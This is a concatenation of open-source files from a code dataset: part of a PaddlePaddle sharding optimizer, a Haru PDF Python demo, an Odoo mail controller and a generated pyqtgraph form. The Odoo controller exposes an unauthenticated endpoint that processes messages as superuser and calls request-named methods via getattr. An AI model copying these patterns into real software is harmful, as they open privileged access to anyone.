var2broadcast_time, key=var2broadcast_time.get,
reverse=True):
logging.info("Sharding broadcast: [{}] times [{}]".format(
var2broadcast_time[varname], varname))
for idx_ in range(len(self._segments)):
logging.info("segment [{}] :".format(idx_))
logging.info("start op: [{}] [{}]".format(block.ops[
self._segments[idx_]._start_idx].desc.type(), block.ops[
self._segments[idx_]._start_idx].desc.input_arg_names(
)))
logging.info("end op: [{}] [{}]".format(block.ops[
self._segments[idx_]._end_idx].desc.type(), block.ops[
self._segments[idx_]._end_idx].desc.input_arg_names()))
return
def _prune_main_program(self, block):
"""
calculate deps from allredce op to optimize op,
remove ops and vars not needed in this worker
1. prune regularization (weight decay)
2. prune cast_fp32_to_fp16; update amp_infine_checking
3. prune gradient_clip related; update global_norm_sum
4. prune optimizer op + param + gradient
"""
weightdecay_helper = WeightDecayHelper()
weightdecay_helper.prune_weight_decay(block, self._shard)
# NOTE (JZ-LIANG) the sync of FoundInfinite should among one entire Model Parallelism
# group. and each Data Parallelism group should have its own sync of FoundInfinite
# amp could use global group for sync
FP16Utils.prune_fp16(block, self._shard, self._reduced_grads_to_param,
self.global_ring_id)
# clipbyglobalnorm should only use the Model paramllelism group (mp-sharding-pp)
if self.mp_degree * self.pp_degree == 1:
# separate the sharding-hybrid senario to keep the accuracy
gradientclip_helper = GradientClipHelper(self.sharding_ring_id)
gradientclip_helper.prune_gradient_clip(
block, self._shard, pure_dp_degree=1)
else:
gradientclip_helper = GradientClipHelper(self.global_ring_id)
gradientclip_helper.prune_gradient_clip(
block, self._shard, pure_dp_degree=self.dp_degree)
# build prog deps
reduced_grads = []
for idx, op in enumerate(block.ops):
input_names = op.desc.input_arg_names()
output_names = op.desc.output_arg_names()
if op.type == "c_allreduce_sum":
assert (len(output_names) == 1)
output_name = output_names[0]
reduced_grads.append(output_name)
# prune optimizer state and param
pruned_opti_vars = []
for var_name in list(block.vars.keys()):
if self._shard.is_opti_var(var_name) and \
not self._shard.has_opt_var(var_name):
pruned_opti_vars.append(var_name)
program_deps = ProgramDeps(block, reduced_grads, pruned_opti_vars)
# Init
for var_name in program_deps._end_vars:
program_deps._should_removed_var.add(var_name)
# Prune
for idx, op in reversed(list(enumerate(block.ops))):
if op.type in [
"c_allreduce_sum",
"c_sync_comm_stream",
"c_calc_comm_stream",
"c_gen_nccl_id",
"c_comm_init",
'send_v2',
'recv_v2',
]:
pass
elif op.type == "conditional_block":
assert (op.desc.has_attr("sub_block"))
subblock_idx = op.desc.attr("sub_block").id
subblock_deps = program_deps.get_sub_block_deps(subblock_idx)
# only prune amp subblock
if subblock_deps is None or not self._is_amp_subblock(op):
continue
# init
reversed_output_vars = []
for output_name in op.desc.output("Out"):
if output_name in program_deps._should_removed_var:
subblock_deps._should_removed_var.add(output_name)
program_deps.crop_output_var_from_op(idx, output_name)
else:
reversed_output_vars.append(output_name)
# prune
for sub_op_idx, _ in reversed(
list(enumerate(subblock_deps._block.ops))):
if subblock_deps.should_remove_op(sub_op_idx):
subblock_deps.remove_op(sub_op_idx)
reversed_input_vars = []
for input_name in op.desc.input('Input'):
if input_name not in subblock_deps._should_removed_var:
reversed_input_vars.append(input_name)
else:
program_deps.crop_input_var_from_op(idx, input_name)
op.desc.set_input('Input', reversed_input_vars)
op.desc.set_output('Out', reversed_output_vars)
else:
# if all outputs of this op are in _should_removed_var
# _should_removed_var: opt state not cur shard
if program_deps.should_remove_op(idx):
program_deps.remove_op(idx)
# NOTE (JZ-LIANG) revise and unify logic here
# sharding support fp16_allreduce logic
block._sync_with_cpp()
for idx, op in reversed(list(enumerate(block.ops))):
if op.type == 'concat' and is_optimizer_op(op):
# remove inputs that not on this card
reserved_x = []
for var_name in op.desc.input("X"):
if block.has_var(var_name): reserved_x.append(var_name)
op.desc.set_input('X', reserved_x)
block._sync_with_cpp()
return
def _add_broadcast_allreduce(self, block):
"""
add broadcast allreduce op
if enable gradient_merge, insert related ops
if combined with pipeline(grad accumulate),
the grad allreduce should be done in optimize role
"""
if len(self._segments) < 1:
return
# sharding
if self.pp_degree > 1 and self.pp_allreduce_in_optimize:
for idx in range(len(self._segments)):
assert len(self._segments[idx]._allreduce_vars) == 0
# NOTE (JZ-LIANG) revise and unify logic here
# fix the _end_idx for segments[-1] if pp is used.
new_end_idx = self._segments[-1]._end_idx
for idx in range(self._segments[-1]._end_idx - 1,
self._segments[-1]._start_idx - 1, -1):
op = block.ops[idx]
if op.type == "fill_constant" or op.type == "sum":
if "MERGED" in op.output_arg_names[0]: new_end_idx = idx + 1
elif op.type == "cast":
if "@TMP" in op.output_arg_names[0]: new_end_idx = idx + 1
self._segments[-1]._end_idx = new_end_idx
if self._segments[-1]._allreduce_vars:
shard_allredue_vars = self._shard.filter_grads(self._segments[-1]
._allreduce_vars)
if self.gradient_merge_mode != "sharding_gm" or self._gradient_merge_acc_step <= 1:
if self.hybrid_dp and self.hybrid_dp_mode == "sharding_hybrid_dp" and len(
shard_allredue_vars) >= 1:
insert_sync_comm_ops(block, self._segments[-1]._end_idx,
self.dp_ring_id, shard_allredue_vars)
insert_allreduce_ops(block, self._segments[-1]._end_idx,
self.dp_ring_id, shard_allredue_vars)
# gradient merge
elif self.gradient_merge_mode == "sharding_gm" and self._gradient_merge_acc_step > 1:
self.create_persistable_gradients_and_insert_merge_ops(
block,
self._startup_program.global_block(),
self._segments[-1]._end_idx, shard_allredue_vars,
self._shard)
insert_sync_comm_ops(block, self._segments[-1]._end_idx,
self.sharding_ring_id,
self._segments[-1]._allreduce_vars)
# allreduce --> reduce
insert_reduce_ops(
block,
self._segments[-1]._end_idx,
self.sharding_ring_id,
self._segments[-1]._allreduce_vars,
self._shard,
op_role=OpRole.Backward,
use_calc_stream=False)
for idx, segment in reversed(list(enumerate(self._segments))):
allreduce_vars = self._segments[
idx - 1]._allreduce_vars if idx > 0 else []
broadcast_vars = self._segments[idx +
1]._broadcast_vars if idx < len(
self._segments) - 1 else []
fill_constant_vars = self._segments[
idx + 2]._fill_constant_vars if idx < len(
self._segments) - 2 else []
cast_ops = self._segments[idx + 2]._cast_ops if idx < len(
self._segments) - 2 else {}
for op_idx in reversed(range(segment._start_idx, segment._end_idx)):
op = block.ops[op_idx]
for input_name in op.desc.input_arg_names():
if input_name in segment._param2broadcast and \
input_name != segment._param2broadcast[input_name]:
op._rename_input(input_name,
segment._param2broadcast[input_name])
for param_name, broadcast_name in segment._param2broadcast.items():
if param_name != broadcast_name:
block.create_var(
name=broadcast_name,
shape=self._main_program.global_block().var(
param_name).shape,
dtype=self._main_program.global_block().var(param_name)
.dtype,
persistable=False)
# step1: remove cast ops
block._sync_with_cpp()
segment._end_idx += FP16Utils.remove_cast_op(block, self._params,
segment, 0)
# step2: add Sync ops
shard_allredue_vars = self._shard.filter_grads(allreduce_vars)
if self.gradient_merge_mode != "sharding_gm" or self._gradient_merge_acc_step <= 1:
if self.hybrid_dp and self.hybrid_dp_mode == "sharding_hybrid_dp" and len(
shard_allredue_vars) >= 1:
insert_sync_comm_ops(block, segment._end_idx,
self.dp_ring_id, shard_allredue_vars)
broad_cast_vars = [x[0] for x in broadcast_vars]
if len(broad_cast_vars) > 0:
insert_sync_comm_ops(block, segment._end_idx,
self.sharding_ring_id,
broad_cast_vars)
else:
comm_dep_vars = allreduce_vars + [
x[0] for x in broadcast_vars
]
if len(comm_dep_vars) > 0:
insert_sync_comm_ops(block, segment._end_idx,
self.sharding_ring_id,
comm_dep_vars)
# gradient merge
elif self.gradient_merge_mode == "sharding_gm" and self._gradient_merge_acc_step > 1:
broad_cast_vars = [x[0] for x in broadcast_vars]
if len(broad_cast_vars) > 0:
insert_sync_comm_ops(block, segment._end_idx,
self.sharding_ring_id, broad_cast_vars)
calc_dep_vars = fill_constant_vars + [
k for k, v in cast_ops.items()
] + self._segments[idx]._allreduce_vars
if len(calc_dep_vars) > 0:
insert_sync_calc_op(block, segment._end_idx,
[calc_dep_vars[-1]])
# step3: insert `fill_constant` ops
insert_fill_constant_ops(block, segment._end_idx,
fill_constant_vars)
# step4: add `cast` ops
insert_cast_ops(block, segment._end_idx, cast_ops)
# step5: add broadcast ops
# gradient merge
if self.gradient_merge_mode == "sharding_gm" and self._gradient_merge_acc_step > 1:
self.create_persistable_gradients_and_insert_merge_ops(
block,
self._startup_program.global_block(), segment._start_idx,
shard_allredue_vars, self._shard)
insert_broadcast_ops(block, segment._start_idx,
self.sharding_ring_id, broadcast_vars)
# step6: add all_reduce ops
# dp
if self.gradient_merge_mode != "sharding_gm" or self._gradient_merge_acc_step <= 1:
if self.hybrid_dp and self.hybrid_dp_mode == "sharding_hybrid_dp" and len(
shard_allredue_vars) >= 1:
insert_allreduce_ops(block, segment._start_idx,
self.dp_ring_id, shard_allredue_vars)
insert_sync_comm_ops(block, segment._start_idx,
self.sharding_ring_id, allreduce_vars)
# gradient merge
elif self.gradient_merge_mode == "sharding_gm" and self._gradient_merge_acc_step > 1:
insert_sync_comm_ops(block, segment._start_idx,
self.sharding_ring_id, allreduce_vars)
# sharding
# allreduce --> reduce
# TODO temp change
if len(allreduce_vars) > 0:
insert_reduce_ops(
block,
segment._start_idx,
self.sharding_ring_id,
allreduce_vars,
self._shard,
op_role=OpRole.Backward,
use_calc_stream=False)
block._sync_with_cpp()
if self._segments[0]._broadcast_vars:
broadcast_vars = [x[0] for x in self._segments[0]._broadcast_vars]
insert_sync_comm_ops(block, self._segments[0]._start_idx,
self.sharding_ring_id, broadcast_vars)
insert_broadcast_ops(block, self._segments[0]._start_idx,
self.sharding_ring_id,
self._segments[0]._broadcast_vars)
fill_constant_vars = []
for x in self._segments[:2]:
fill_constant_vars += x._fill_constant_vars
# Join
cast_ops = {}
for x in self._segments[:2]:
for k, v in x._cast_ops.items():
cast_ops[k] = v
calc_deps_vars = fill_constant_vars + [k for k, v in cast_ops.items()]
if fill_constant_vars or cast_ops:
insert_sync_calc_op(block, self._segments[0]._start_idx,
[calc_deps_vars[-1]])
if fill_constant_vars:
insert_fill_constant_ops(block, self._segments[0]._start_idx,
fill_constant_vars)
if cast_ops:
insert_cast_ops(block, self._segments[0]._start_idx, cast_ops)
return
def _prune_startup_program(self, block):
for idx, op in reversed(list(enumerate(block.ops))):
for output_name in op.desc.output_arg_names():
if self._shard.has_var(output_name):
continue
#TODO why do we remove op, when only one var is removed
block._remove_op(idx, sync=False)
break
for var_name in list(block.vars.keys()):
if self._shard.has_var(var_name):
continue
block._remove_var(var_name, sync=False)
block._sync_with_cpp()
def _build_groups(self):
"""
pre-assign ring ids
mp: 0
sharding: 1
pure-dp: 2
global: 3
pp: >= 20
if one parallelism is not enable: -1
and only support parallelism hierarchy: mp --> sharding --> pp --> dp
"""
# step 1: initialize nccl
self.global_word_size = self.role_maker._worker_num()
self.global_rank = self.role_maker._worker_index()
self.global_endpoints = self.role_maker._get_trainer_endpoints()
self.current_endpoint = self.global_endpoints[self.global_rank]
self._collective_helper = CollectiveHelper(
self.role_maker, nrings=self._nrings_sharding)
assert self.global_word_size % self.mp_degree == 0, \
"global_word_size: {} should be divisible to the mp_degree: {}".format(self.global_word_size, self.mp_degree)
assert self.global_word_size % self.sharding_degree == 0, \
"global_word_size: {} should be divisible to the sharding_degree: {}".format(self.global_word_size, self.sharding_degree)
assert self.global_word_size % self.pp_degree == 0, \
"global_word_size: {} should be divisible to the pp_degree: {}".format(self.global_word_size, self.pp_degree)
assert self.global_word_size % self.dp_degree == 0, \
"global_word_size: {} should be divisible to the dp_degree: {}".format(self.global_word_size, self.dp_degree)
# mp group
if self.mp_degree > 1:
self.mp_ring_id = 0
self.mp_rank = self.global_rank % self.mp_degree
self.mp_group_id = self.global_rank // self.mp_degree
self.mp_group_endpoints = [
ep for idx, ep in enumerate(self.global_endpoints)
if idx // self.mp_degree == self.mp_group_id
]
assert self.current_endpoint in self.mp_group_endpoints
assert len(
self.mp_group_endpoints
) == self.mp_degree, "num of mp worker in group is [{}], but mp group size is [{}]".format(
len(self.mp_group_endpoints), self.mp_degree)
else:
self.mp_degree = 1
self.mp_ring_id = -1
self.mp_rank = -1
self.mp_group_id = -1
self.mp_group_endpoints = []
# sharding
if self.sharding_degree > 1:
self.sharding_ring_id = 1
self.sharding_rank = (self.global_rank //
self.mp_degree) % self.sharding_degree
self.sharding_group_id = self.global_rank // (self.mp_degree *
self.sharding_degree)
# mp + sharding + ...
if self.mp_degree > 1:
self.sharding_group_endpoints = [
ep for idx, ep in enumerate(self.global_endpoints)
if (idx // (self.mp_degree * self.sharding_degree)) == self.
sharding_group_id and idx % self.mp_degree == self.mp_rank
]
# sharding + ...
else:
self.sharding_group_endpoints = [
ep for idx, ep in enumerate(self.global_endpoints)
if (idx // (self.mp_degree * self.sharding_degree)
) == self.sharding_group_id
]
assert self.current_endpoint in self.sharding_group_endpoints
else:
self.sharding_degree = 1
self.sharding_ring_id = -1
self.sharding_rank = -1
self.sharding_group_id = -1
self.sharding_group_endpoints = []
# pp
if self.pp_degree > 1:
self.pp_ring_id = 20
self.pp_rank = self.global_rank // (self.sharding_degree *
self.mp_degree) % self.pp_degree
# (NOTE): Already adjust for (outter-pure) dp
self.pp_group_id = self.global_rank // (
self.mp_degree * self.sharding_degree * self.pp_degree)
pp_first_stage_idx = self.global_rank % (
self.sharding_degree * self.mp_degree) + self.pp_group_id * (
self.mp_degree * self.sharding_degree * self.pp_degree)
pp_stage_offset = self.sharding_degree * self.mp_degree
self.pp_group_endpoints = []
for i in range(self.pp_degree):
self.pp_group_endpoints.append(self.global_endpoints[
pp_first_stage_idx + pp_stage_offset * i])
assert self.current_endpoint in self.pp_group_endpoints
else:
self.pp_degree = 1
self.pp_ring_id = -1
self.pp_rank = -1
self.pp_group_id = -1
self.pp_group_endpoints = []
# outter-pure-dp group
# NOTE (JZ-LIANG) support outter-pure-dp to scale the throughput in 3D parallelism
# e.g. mp-sharding-pp-dp
# sharding-hybrid-dp as one senario of outter-pure-dp
assert self.global_word_size == self.mp_degree * self.sharding_degree * self.pp_degree * self.dp_degree, "mp_degree: [{}], sharding_degree: [{}], pp_degree: [{}], dp_degree: [{}]; BUT global nrank: [{}]".format(
self.mp_degree, self.sharding_degree, self.pp_degree,
self.dp_degree, self.global_word_size)
if self.dp_degree > 1:
self.dp_ring_id = 2
self.dp_rank = self.global_rank // (self.sharding_degree *
self.mp_degree * self.pp_degree)
dp_first_rank_idx = self.global_rank % (
self.sharding_degree * self.mp_degree * self.pp_degree)
dp_offset = (self.sharding_degree * self.mp_degree * self.pp_degree)
self.dp_group_endpoints = []
for i in range(self.dp_degree):
self.dp_group_endpoints.append(self.global_endpoints[
dp_first_rank_idx + dp_offset * i])
assert self.current_endpoint in self.dp_group_endpoints
logging.info("Hybrid DP mode turn on !")
else:
self.dp_ring_id = -1
self.dp_rank = -1
self.dp_group_endpoints = []
# global group
# use for gen_nccl_comm_sync, amp check nan inf, clip by global norm
# NOTE (JZ-LIANG) when use global ring for calc global norm and dp_degree > 1, the allreduce result should be devided by dp_degree
self.global_ring_id = 3
logging.info("global word size: {}".format(self.global_word_size))
logging.info("global rank: {}".format(self.global_rank))
logging.info("global endpoints: {}".format(self.global_endpoints))
logging.info("global ring id: {}".format(self.global_ring_id))
logging.info("#####" * 6)
logging.info("mp group size: {}".format(self.mp_degree))
logging.info("mp rank: {}".format(self.mp_rank))
logging.info("mp group id: {}".format(self.mp_group_id))
logging.info("mp group endpoints: {}".format(self.mp_group_endpoints))
logging.info("mp ring id: {}".format(self.mp_ring_id))
logging.info("#####" * 6)
logging.info("sharding group size: {}".format(self.sharding_degree))
logging.info("sharding rank: {}".format(self.sharding_rank))
logging.info("sharding group id: {}".format(self.sharding_group_id))
logging.info("sharding group endpoints: {}".format(
self.sharding_group_endpoints))
logging.info("sharding ring id: {}".format(self.sharding_ring_id))
logging.info("#####" * 6)
logging.info("pp group size: {}".format(self.pp_degree))
logging.info("pp rank: {}".format(self.pp_rank))
logging.info("pp group id: {}".format(self.pp_group_id))
logging.info("pp group endpoints: {}".format(self.pp_group_endpoints))
logging.info("pp ring id: {}".format(self.pp_ring_id))
logging.info("#####" * 6)
logging.info("pure dp group size: {}".format(self.dp_degree))
logging.info("pure dp rank: {}".format(self.dp_rank))
logging.info("pure dp group endpoints: {}".format(
self.dp_group_endpoints))
logging.info("pure dp ring id: {}".format(self.dp_ring_id))
logging.info("#####" * 6)
return
def _initialization_broadcast(self, startup_block):
"""
this funtion is to ensure the initialization between dp group to be
identical when hybrid-dp is used.
"""
params = []
for param in startup_block.iter_parameters():
params.append(param)
startup_block.append_op(
type='c_broadcast',
inputs={'X': param},
outputs={'Out': param},
attrs={
'ring_id': self.dp_ring_id,
'root': 0,
OP_ROLE_KEY: OpRole.Forward
})
startup_block.append_op(
type='c_sync_comm_stream',
inputs={'X': params},
outputs={'Out': params},
attrs={'ring_id': self.dp_ring_id,
OP_ROLE_KEY: OpRole.Forward})
# sync within global group
append_naive_sync(startup_block, self.startup_prog_sync_var,
self.global_ring_id)
# sharding gradient merge
def create_persistable_gradients_and_insert_merge_ops(
self, main_block, startup_block, insert_idx, grad_names, shard):
for grad_name in grad_names:
assert get_grad_device(
grad_name, shard
) == shard.worker_idx, "try to merge gradient not belong to current shard: [{}]".format(
grad_name)
persistable_grad_name = grad_name + '@GradiantMerge'
assert grad_name not in self._grad2merged_grad, "grad [{}] already in grad2merged_grad, maybe you meet sharing weight case !".format(
grad_name)
self._grad2merged_grad[grad_name] = persistable_grad_name
grad_var = main_block.var(grad_name)
# create var
gradient_merge_var = main_block.create_var(
name=persistable_grad_name,
shape=grad_var.shape,
dtype=grad_var.dtype,
persistable=True)
startup_gradient_merge_var = startup_block.create_var(
name=persistable_grad_name,
shape=grad_var.shape,
dtype=grad_var.dtype,
persistable=True)
# merge gradient
main_block._insert_op_without_sync(
insert_idx,
type="elementwise_add",
inputs={'X': grad_name,
'Y': gradient_merge_var},
outputs={'Out': gradient_merge_var},
attrs={
'axis': -1,
'use_mkldnn': False,
OP_ROLE_KEY: OpRole.Backward
})
# startup initialization
startup_block.append_op(
type="fill_constant",
outputs={"Out": startup_gradient_merge_var},
attrs={
"shape": grad_var.shape,
"dtype": grad_var.dtype,
"value": float(0),
})
main_block._sync_with_cpp()
startup_block._sync_with_cpp()
def _create_gm_cond(self, main_block):
# Add const var
acc_step_var = layers.create_global_var(
name="gradient_merge_acc_step",
shape=[1],
value=int(self._gradient_merge_acc_step),
dtype='int32',
persistable=True,
force_cpu=True)
zero_var = layers.create_global_var(
name="gradient_merge_zero",
shape=[1],
value=int(0),
dtype='int32',
persistable=True,
force_cpu=True)
# Add step var & cond var
current_step_var = layers.create_global_var(
name="gradient_merge_current_step",
shape=[1],
value=int(0),
dtype='int32',
persistable=True,
force_cpu=True)
cond_var = layers.create_global_var(
name="gradient_merge_cond",
shape=[1],
value=bool(0),
dtype='bool',
persistable=False,
force_cpu=True)
with device_guard("cpu"):
# step_var = (step_var + 1) % k_step
main_block.append_op(
type='increment',
inputs={'X': [current_step_var]},
outputs={'Out': [current_step_var]},
attrs={'step': float(1),
OP_ROLE_KEY: OpRole.Optimize})
main_block.append_op(
type='elementwise_mod',
inputs={'X': current_step_var,
'Y': acc_step_var},
outputs={'Out': current_step_var},
attrs={
'axis': -1,
OP_ROLE_KEY: OpRole.Optimize,
'use_mkldnn': False
})
# cond_var = (step_var == 0)
main_block.append_op(
type='equal',
inputs={'X': current_step_var,
'Y': zero_var},
outputs={'Out': cond_var},
attrs={OP_ROLE_KEY: OpRole.Optimize})
# paddle.static.Print(current_step_var, message="in FWBW last conditional")
return cond_var
def _true_apply_gradient(self):
"""
allreduce grad@gradientmerge in dp group
grad@gradientmerge / acc_step
re-create all optimize ops of origin main block and rename them
cast(backward)
amp
clip
opt
# fill constant grad@gradientmerge
"""
# current conditional block
main_block = self._main_program.global_block()
cur_block_idx = self._main_program.current_block_idx
cur_block = self._main_program.current_block()
self.cond_block = self._main_program.current_block()
# cur_block's forward_block & backward_block is itself
cur_block._set_forward_block_idx(cur_block_idx)
# allreduce grad@gradientmerge
if self.hybrid_dp:
assert self.dp_ring_id >= 0, "dp_ring_id should larger than 0 when in sharding&DP mode"
for grad, merged_grad in self._grad2merged_grad.items():
merged_grad_var = main_block.var(merged_grad)
cur_block.append_op(
type='c_allreduce_sum',
inputs={'X': merged_grad_var},
outputs={'Out': merged_grad_var},
attrs={
'ring_id': self.dp_ring_id,
'use_calc_stream': True,
OP_ROLE_KEY: OpRole.Optimize
})
# grad@gradientmerge / acc_step
for grad, merged_grad in self._grad2merged_grad.items():
# grad /= k_steps
merged_grad_var = main_block.var(merged_grad)
cur_block.append_op(
type='scale',
inputs={'X': merged_grad_var},
outputs={'Out': merged_grad_var},
attrs={
'scale': 1.0 / float(self._gradient_merge_acc_step),
'bias': 0.0,
'bias_after_scale': False,
OP_ROLE_KEY: OpRole.Optimize
})
# re-create optimize ops
already_moved_var_names = []
for op_desc in self.original_optimize_ops_desc:
new_op_desc = cur_block.desc.append_op()
new_op_desc.copy_from(op_desc)
for input_name in new_op_desc.input_arg_names():
if input_name in self._grad2merged_grad:
new_op_desc._rename_input(
input_name, self._grad2merged_grad[input_name])
for output_name in new_op_desc.output_arg_names():
if output_name in self._grad2merged_grad:
new_op_desc._rename_output(
output_name, self._grad2merged_grad[output_name])
# move non temp optimize vars from block0 to cond block
if output_name not in already_moved_var_names and output_name not in self._grad2merged_grad.keys(
):
var_ = self._main_program.global_block().var(output_name)
if not var_.persistable:
# move
name_ = var_.name
shape_ = var_.shape
type_ = var_.dtype
self._main_program.global_block()._remove_var(
var_.name, sync=False)
self.cond_block.create_var(
name=name_,
shape=shape_,
dtype=type_,
persistable=False)
already_moved_var_names.append(name_)
self._main_program.global_block()._sync_with_cpp()
cur_block._sync_with_cpp()
# fill zero to grad@gradientmerge
for grad, merged_grad in self._grad2merged_grad.items():
merged_grad_var = main_block.var(merged_grad)
cur_block.append_op(
type='fill_constant',
outputs={'Out': merged_grad_var},
attrs={
"shape": merged_grad_var.shape,
"dtype": merged_grad_var.dtype,
"value": float(0),
OP_ROLE_KEY: OpRole.Optimize
})
# lr_var = main_block.var("gradient_merge_current_step")
# paddle.static.Print(lr_var, message="in OPTIMIZE last conditional")
def _sharding_gradient_merge(self, main_block):
"""
copy all optimize ops in origin main block
remove all optimize ops in origin main block
create cond block
"""
# copy original optimize ops to temp ops desc list
# remove them from block 0
tmp_copy_block = self._main_program._create_block()
self.original_optimize_ops_desc = []
for op_idx, op in reversed(list(enumerate(main_block.ops))):
if int(op.attr('op_role')) != int(OpRole.Optimize):
continue
else:
tmp_op_desc = tmp_copy_block.desc.append_op()
tmp_op_desc.copy_from(op.desc)
self.original_optimize_ops_desc.append(tmp_op_desc)
main_block._remove_op(op_idx, sync=False)
tmp_copy_block._sync_with_cpp()
self.original_optimize_ops_desc = list(
reversed(self.original_optimize_ops_desc))
# back to block 0
self._main_program._rollback()
# create cond vars and ops at the end of block 0
cond = self._create_gm_cond(main_block)
# create cond block
cond_block = self._main_program._create_block()
self._true_apply_gradient()
# back to block 0
self._main_program._rollback()
# cond op
step_scope = self._main_program.global_block().create_var(
type=core.VarDesc.VarType.STEP_SCOPES)
conditional_block_op = self._main_program.global_block().append_op(
type='conditional_block',
inputs={
'Cond': cond,
'Input': [],
},
outputs={'Out': [],
'Scope': [step_scope]},
attrs={
'sub_block': cond_block,
'is_scalar_condition': True,
})
| apache-2.0 |
koljanos/dakoljanos-anotherone | jni/libhpdf-2.3.0RC2/if/python/demo/chfont_demo.py | 32 | 3358 | ###
## * << Haru Free PDF Library 2.0.0 >> -- chfont_demo.c
## *
## * Copyright (c) 1999-2006 Takeshi Kanno <takeshi_kanno@est.hi-ho.ne.jp>
## *
## * Permission to use, copy, modify, distribute and sell this software
## * and its documentation for any purpose is hereby granted without fee,
## * provided that the above copyright notice appear in all copies and
## * that both that copyright notice and this permission notice appear
## * in supporting documentation.
## * It is provided "as is" without express or implied warranty.
## *
##
## port to python by Li Jun
## http://groups.google.com/group/pythoncia
import os, sys
from ctypes import *
up=2
def setlibpath(up):
import sys
path=os.path.normpath(os.path.split(os.path.realpath(__file__))[0]+'\..'*up)
if path not in sys.path:
sys.path.append(path)
setlibpath(up)
from haru import *
from haru.c_func import *
from haru.hpdf_errorcode import *
from grid_sheet import *
@HPDF_Error_Handler(None, HPDF_UINT, HPDF_UINT, c_void_p)
def error_handler (error_no, detail_no, user_data):
global pdf
printf ("ERROR: %s, detail_no=%u\n", error_detail[error_no],
detail_no)
HPDF_Free (pdf)
sys.exit(1)
def main ():
global pdf
if (len(sys.argv) < 4):
printf ("chfont_demo <cp936-ttc-font-file-name> "
"<cp936-index> <cp932-ttc-font-file-name> <cp932-index>\n")
return 1
fname="mbtext/%s"% "cp932.txt"
cp932 = open (fname, "rb")
if (not cp932):
printf ("error: cannot open cp932.txt\n")
return 1
fname= "mbtext/%s" % "cp936.txt"
cp936 = open (fname, "rb")
if (not cp936):
printf ("error: cannot open cp936.txt\n")
return 1
fname=os.path.realpath(sys.argv[0])
fname=fname[:fname.rfind('.')]+'.pdf'
pdf = HPDF_New (error_handler, NULL)
if (not pdf):
printf ("error: cannot create PdfDoc object\n")
return 1
HPDF_SetCompressionMode (pdf, HPDF_COMP_ALL)
HPDF_UseJPEncodings (pdf)
HPDF_UseCNSEncodings (pdf)
fcp936_name = HPDF_LoadTTFontFromFile2 (pdf, sys.argv[1], int(sys.argv[2]),
HPDF_TRUE)
fcp932_name = HPDF_LoadTTFontFromFile2 (pdf, sys.argv[3], int(sys.argv[4]),
HPDF_TRUE)
# add a new page object.
page = HPDF_AddPage (pdf)
HPDF_Page_SetHeight (page, 300)
HPDF_Page_SetWidth (page, 550)
fcp936 = HPDF_GetFont (pdf, fcp936_name, "GBK-EUC-H")
fcp932 = HPDF_GetFont (pdf, fcp932_name, "90ms-RKSJ-H")
print_grid (pdf, page)
HPDF_Page_SetTextLeading (page, 20)
HPDF_Page_BeginText (page)
HPDF_Page_MoveTextPos (page, 50, 250)
HPDF_Page_SetTextLeading (page, 25)
buf=cp936.read(1024)
while buf:
HPDF_Page_SetFontAndSize (page, fcp936, 18)
buf ='%s\0' % buf
HPDF_Page_ShowText (page, buf)
buf=cp936.read(1024)
if buf:
HPDF_Page_SetFontAndSize (page, fcp932, 18)
buf ='%s\0' % buf
HPDF_Page_ShowText (page, buf)
HPDF_Page_MoveToNextLine (page)
# save the document to a file
HPDF_SaveToFile (pdf, fname)
# clean up
HPDF_Free (pdf)
cp936.close ()
cp932.close ()
return 0
main() | gpl-3.0 |
Jgarcia-IAS/localizacion | openerp/addons-extra/odoo-pruebas/odoo-server/addons/mail/controllers/main.py | 383 | 1733 | import base64
import psycopg2
import openerp
from openerp import SUPERUSER_ID
from openerp import http
from openerp.http import request
from openerp.addons.web.controllers.main import content_disposition
import mimetypes
class MailController(http.Controller):
_cp_path = '/mail'
@http.route('/mail/download_attachment', type='http', auth='user')
def download_attachment(self, model, id, method, attachment_id, **kw):
# FIXME use /web/binary/saveas directly
Model = request.registry.get(model)
res = getattr(Model, method)(request.cr, request.uid, int(id), int(attachment_id))
if res:
filecontent = base64.b64decode(res.get('base64'))
filename = res.get('filename')
content_type = mimetypes.guess_type(filename)
if filecontent and filename:
return request.make_response(
filecontent,
headers=[('Content-Type', content_type[0] or 'application/octet-stream'),
('Content-Disposition', content_disposition(filename))])
return request.not_found()
@http.route('/mail/receive', type='json', auth='none')
def receive(self, req):
""" End-point to receive mail from an external SMTP server. """
dbs = req.jsonrequest.get('databases')
for db in dbs:
message = dbs[db].decode('base64')
try:
registry = openerp.registry(db)
with registry.cursor() as cr:
mail_thread = registry['mail.thread']
mail_thread.message_process(cr, SUPERUSER_ID, None, message)
except psycopg2.Error:
pass
return True
| agpl-3.0 |
phborba/dsgtoolsop | ProfileTool/pyqtgraph/graphicsItems/ViewBox/axisCtrlTemplate_pyqt.py | 38 | 6134 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file './pyqtgraph/graphicsItems/ViewBox/axisCtrlTemplate.ui'
#
# Created: Mon Dec 23 10:10:51 2013
# by: PyQt4 UI code generator 4.10
#
# WARNING! All changes made in this file will be lost!
from ...Qt import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(186, 154)
Form.setMaximumSize(QtCore.QSize(200, 16777215))
self.gridLayout = QtGui.QGridLayout(Form)
self.gridLayout.setMargin(0)
self.gridLayout.setSpacing(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.label = QtGui.QLabel(Form)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayout.addWidget(self.label, 7, 0, 1, 2)
self.linkCombo = QtGui.QComboBox(Form)
self.linkCombo.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)
self.linkCombo.setObjectName(_fromUtf8("linkCombo"))
self.gridLayout.addWidget(self.linkCombo, 7, 2, 1, 2)
self.autoPercentSpin = QtGui.QSpinBox(Form)
self.autoPercentSpin.setEnabled(True)
self.autoPercentSpin.setMinimum(1)
self.autoPercentSpin.setMaximum(100)
self.autoPercentSpin.setSingleStep(1)
self.autoPercentSpin.setProperty("value", 100)
self.autoPercentSpin.setObjectName(_fromUtf8("autoPercentSpin"))
self.gridLayout.addWidget(self.autoPercentSpin, 2, 2, 1, 2)
self.autoRadio = QtGui.QRadioButton(Form)
self.autoRadio.setChecked(True)
